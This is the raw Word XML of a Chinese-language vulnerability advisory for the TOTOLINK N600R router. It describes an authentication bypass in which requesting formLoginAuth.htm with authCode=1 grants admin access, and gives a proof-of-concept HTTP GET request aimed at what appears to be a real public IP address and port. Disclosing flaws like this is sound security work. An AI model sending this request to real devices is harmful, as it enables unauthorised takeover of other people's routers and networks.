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tolinkn600r旁路绕过漏洞"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">TOTOLINK_N600R旁路绕过漏洞</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="20"/>
    <w:bookmarkStart w:id="21" w:name="厂商"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">厂商</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">TOTOLINK</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="21"/>
    <w:bookmarkStart w:id="24" w:name="影响设备"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">影响设备</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">N600R</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:hyperlink r:id="rId22">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">http://www.totolink.cn/home/menu/detail.html?menu_listtpl=download&amp;id=2&amp;ids=36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固件下载</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:bookmarkEnd w:id="24"/>
    <w:bookmarkStart w:id="25" w:name="描述"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">描述</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">TOTOLINK N600R存在旁路绕过漏洞，无需身份认证即可进入后台界面</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="25"/>
    <w:bookmarkStart w:id="29" w:name="细节"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">细节</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">在N600R的web程序lighttpd中访问formLoginAuth.htm传入authCode为1即可绕过密码直接进入后台</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="352154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Users/doudou/Library/Application%20Support/typora-user-images/image-2022040518300124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9"/>
    <w:bookmarkStart w:id="33" w:name="poc"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">POC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /formLoginAuth.htm?authCode=1 HTTP/1.1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Host: 14.199.103.239:8080</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:98.0) Gecko/20100101 Firefox/98.0</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Accept-Encoding: gzip, deflate</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Connection: close</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Upgrade-Insecure-Requests: 1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="76046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Users/doudou/Library/Application%20Support/typora-user-images/image-2022040518353564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3" Target="http://www.totolink.cn/data/upload/20210717/5367f1e24aceb55b684339be59df129d.zip" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId22" Target="http://www.totolink.cn/home/menu/detail.html?menu_listtpl=download&amp;id=2&amp;ids=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www.totolink.cn/data/upload/20210717/5367f1e24aceb55b684339be59df129d.zip" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId22" Target="http://www.totolink.cn/home/menu/detail.html?menu_listtpl=download&amp;id=2&amp;ids=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2022-04-05T10:52:09Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-04-05T10:52:09Z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